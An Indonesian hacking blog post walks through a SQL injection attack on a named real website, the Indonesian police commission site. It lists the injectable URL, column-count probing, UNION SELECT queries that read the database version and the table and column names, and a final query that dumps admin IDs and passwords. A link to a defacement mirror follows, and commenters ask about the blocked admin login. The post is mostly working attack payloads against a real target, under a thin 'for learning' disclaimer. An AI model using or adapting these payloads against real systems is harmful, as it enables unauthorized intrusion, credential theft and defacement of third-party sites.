09 Oktober 2011

Filled Under:

SQLi On Komisi Kepolisian



Tindakan saya bukan untuk merusak, tapi semata-mata hanya untuk media pembelajaran. Why ? 
Tujuannya agar kemanan website negara kita lebih di tingkatkan lagi . 
Sekali lagi saya minta maaf kalau ada kesalahan disini. Lets we start dude :

#[0x3a]. Chek the vull sql injection

http://www.komisikepolisianindonesia.com/secondPg.php?cat=video&view=34'

secondPg.php?cat=video&view=34 order 1-- false
secondPg.php?cat=video&view=34 order 2-- false
secondPg.php?cat=video&view=34 order 3-- false
secondPg.php?cat=video&view=34 order 4-- false
secondPg.php?cat=video&view=34 order 5-- false
secondPg.php?cat=video&view=34 order 6-- false
secondPg.php?cat=video&view=34 order 7-- false
secondPg.php?cat=video&view=34 order 8-- false
secondPg.php?cat=video&view=34 order 9-- false
secondPg.php?cat=video&view=34 order 10-- true

---> We've got the point to inject !

#[0x3b]. Chek the version database:

secondPg.php?cat=video&view=-134+union+all+select+1,2,3,4,5,6,7,8,9--

we've got a lucky number "2"

secondPg.php?cat=video&view=-134+union+all+select+1,version(),3,4,5,6,7,8,9--

- If version 5.0 = you lucky :D
- If version 4.0 = you dead :( [that's blind] hahaha ...

#[0x3c]. Tabel & column

secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables +where+table_schema=database()--

secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns +where+table_schema=database()--

Just switch

(table_name) --> (column_name)
from+information_schema.tables ---> from+information_schema.columns

Finally :

http://www.komisikepolisianindonesia.com/secondPg.php?cat=video&view=-134+union+all+select+1,group_concat(admin_id,0x3a,admin_password),3,4,5,6,7,8,9+from+inweb_admin--
---------------------------------------------------------------

Mirror Deface :

http://indonesiandefacer.org/mirror/2011/10/komisikepolisianindonesia.html






3 komentar:

fandi susilo mengatakan...

admin loginnya kok di blok kak??

fandi susilo mengatakan...

admin loginya kok di blok kak???

Aldjazara mengatakan...

hahaa, saya udah lupa mungkin :D